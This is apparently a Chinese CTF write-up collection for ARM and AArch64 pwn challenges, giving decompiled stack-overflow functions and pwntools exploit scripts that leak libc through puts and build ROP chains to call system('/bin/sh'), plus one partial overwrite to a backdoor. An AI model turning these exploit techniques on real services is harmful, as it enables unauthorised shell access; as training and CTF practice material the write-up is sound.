异架构刷题记录
2022安询杯babyarm
分析流程可以发现,就是一个变表base64加密,然后异架构的栈溢出罢了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| int sub_10B60()
{
unsigned int v0;
int result;
char v2[32];
void *s;
void *buf;
buf = malloc(0x80u);
printf("msg> ");
read(0, buf, 0x80u);
s = malloc(0x200u);
memset(s, 0, 0x200u);
v0 = strlen((const char *)buf);
base64((int)buf, v0, (int)s);
printf("res> ");
puts((const char *)s);
result = strcmp((const char *)s, "Sp5jS6mpH6LZC6GqSWe=");
if ( !result )
{
printf("comment> ");
return read(0, v2, 256u);
}
return result;
}
|
解题思路
通过base64变表解密,然后栈溢出输出基址,然后ret2libc就行了
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| from pwn import *
msg = b's1mpl3Dec0d4r\n'
io = remote("127.0.0.1",1000)
io.recvuntil("msg> ")
io.send(msg)
elf = ELF("./chall")
pop_r45678_sb_sl_pc = 0x00010cb0
pop_r3_pc = 0x00010464
mov_r0_r7_blx_r3 = 0x00010ca0
libc = ELF("./libc-2.27.so")
main_addr = 0x00010C30
payload = b'a'*(32+8+4)+p32(pop_r3_pc)+p32(elf.plt['puts'])+p32(pop_r45678_sb_sl_pc)+p32(0)*3+p32(elf.got['puts'])+p32(0)*3+p32(mov_r0_r7_blx_r3)+p32(main_addr)*10
io.recvuntil("comment> ")
io.send(payload)
puts_got = u32(io.recv(4))
print(f"[+] puts_got = {hex(puts_got)}")
libc_base = puts_got-libc.sym['puts']
print(f"[+] libc_base = {hex(libc_base)}")
sys_addr = libc_base+libc.sym['system']
binsh_addr = libc_base+next(libc.search(b"/bin/sh"))
print(f"[+] sys_addr = {hex(sys_addr)}")
print(f"[+] binsh_addr = {hex(binsh_addr)}")
payload = b'a'*(32+8+4)+p32(pop_r3_pc)+p32(sys_addr)+p32(pop_r45678_sb_sl_pc)+p32(0)*3+p32(binsh_addr)+p32(0)*3+p32(mov_r0_r7_blx_r3)+p32(main_addr)*10
io.recvuntil("msg> ")
io.send(msg)
io.recvuntil("comment> ")
io.send(payload)
io.interactive()
|
2022年美团杯_ret2libc_aarch64
分析下来存在明显的栈溢出
1
2
3
4
5
6
7
8
9
10
| __int64 overflow()
{
char s[128];
printf("> ");
gets(s);
puts("Your Input: \n");
puts(s);
return 0LL;
}
|
解题思路
发现存在栈溢出,于是第一时间想到ret2csu,但是发型csu中含有0x0a,于是我们换成其他的,可以泄露libc的地址,于是我们利用libc里面的gadget去getshell
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| def exploit():
puts_got = 0x411030
ru("3.Exit.\n")
sl(b"1")
sla("sensible>>\n",p64(puts_got))
puts_addr = 0x5500000000+u64(r(3).ljust(8,b"\x00"))
base_addr = puts_addr-libc.symbols["puts"]
system_addr = base_addr+libc.symbols["system"]
binsh_addr = base_addr+next(libc.search(b"/bin/sh\x00"))
addr_name_list = ['puts','base','system','binsh']
for i in addr_name_list:
exec("print('{}_addr is :',hex({}_addr))".format(i, i))
gadgets = 0x0000000000068e40 + base_addr
deadbeef = 0xdeadbeef
pl = b'A'*0x88+p64(gadgets)+p64(deadbeef)*2+p64(deadbeef)+p64(system_addr)+p64(deadbeef)+p64(binsh_addr)
ru(">")
sl(b'2')
ru("sensible>>")
sl(pl)
|
Dest0g3_520迎新赛_ez_aarch
刚开始发现是栈溢出,但是保护基本全部开启了,给我吓了一跳,但是后来才发现存在后门,于是简单部分覆盖即可
1
2
3
4
5
6
7
8
| __int64 sub_968()
{
char buf;
puts("Please leave your name:");
read(0, &buf, 48uLL);
return puts("OK, you can exploit it now.");
}
|
exp
1
2
| def exploit():
sa("Please leave your name:\n",b"A"*0x28+p8(0x3c))
|
login
和babyarm打法是一样的
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| def exploit():
po_r4_r5_r6_r7_r8_sb_sl_pc = 0x0001070c
mov_r0_r7_blx_r3 = 0x000106fc
pop_r3_pc = 0x000103f0
puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
ru("Please enter your username: ")
sl(b'admin')
ru("Please enter your password: ")
pl = b"A"*0x108+p32(po_r4_r5_r6_r7_r8_sb_sl_pc)+p32(0)*3+p32(puts_got)+p32(0)*3+p32(pop_r3_pc)+p32(puts_plt)+p32(mov_r0_r7_blx_r3)+p32(0)*7+p32(0x00105D0)
sl(pl)
ru(".\n")
libc_base = u32(io.recv(4))-libc.sym["puts"]
print(f"[+] libc_base = {hex(libc_base)}")
sys_addr = libc_base+libc.sym["system"]
binsh_addr = libc_base + next(libc.search(b"/bin/sh"))
ru("Please enter your username: ")
sl(b'admin')
ru("Please enter your password: ")
payload =b"A"*0x108+p32(pop_r3_pc)+p32(sys_addr)+p32(po_r4_r5_r6_r7_r8_sb_sl_pc)+p32(0)*3+p32(binsh_addr)+p32(0)*3+p32(mov_r0_r7_blx_r3)+p32(0x00105D0)
sl(payload)
|
